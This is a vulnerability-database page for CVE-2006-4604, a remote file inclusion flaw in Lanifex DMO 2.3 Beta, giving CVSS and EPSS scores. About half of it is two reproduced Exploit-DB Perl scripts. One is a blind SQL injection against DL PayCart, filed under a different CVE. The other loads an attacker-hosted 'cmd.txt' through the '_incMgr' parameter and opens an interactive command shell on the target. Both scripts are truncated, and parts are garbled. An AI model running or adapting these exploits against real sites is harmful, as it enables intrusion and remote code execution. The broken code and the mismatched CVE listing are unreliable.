CVE-2006-4604
published 2006-09-07CVE-2006-4604: PHP remote file inclusion vulnerability in LFXlib/access_manager.php in Lanifex Database of Managed Objects (DMO) 2.3 Beta and earlier allows remote attackers…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.43%
82.2th percentile
PHP remote file inclusion vulnerability in LFXlib/access_manager.php in Lanifex Database of Managed Objects (DMO) 2.3 Beta and earlier allows remote attackers to execute arbitrary PHP code via the _incMgr parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lanifex | lanifex | <= 2.3_beta | — |
| lanifex | lanifex | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
exploitdb·2007-08-28
CVE-2007-4604 DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection
---
#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site : http://www.dinkumsoft.com/
# Thanks To
# bot : sqlscan, hantu_internet, xcart
# chanell : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
if (@ARGV new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;
if ($res !~ /n
Exploit-DB
Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4604 Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion
Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion
---
#!/usr/bin/perl
use LWP::UserAgent;
#/*
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- DMO: Lanifex Database of Managed Objects
#
# perl exploit.pl http://site.com/[DMO_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example:
#
# cmd shell variable: ($_GET[cmd]);
#
$sciezka = $ARGV[0];
$sciezkacmd = $ARGV[1];
$komenda = $ARGV[2];
if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || !$komenda){usage()}
head();
while()
{
print "[shell] \$";
while()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$sciezka.'LFXlib/access_manager.php?_incMgr='.$sciezkacmd.'?&'.$komenda.'
No writeups or analysis indexed.
2006-09-07
Published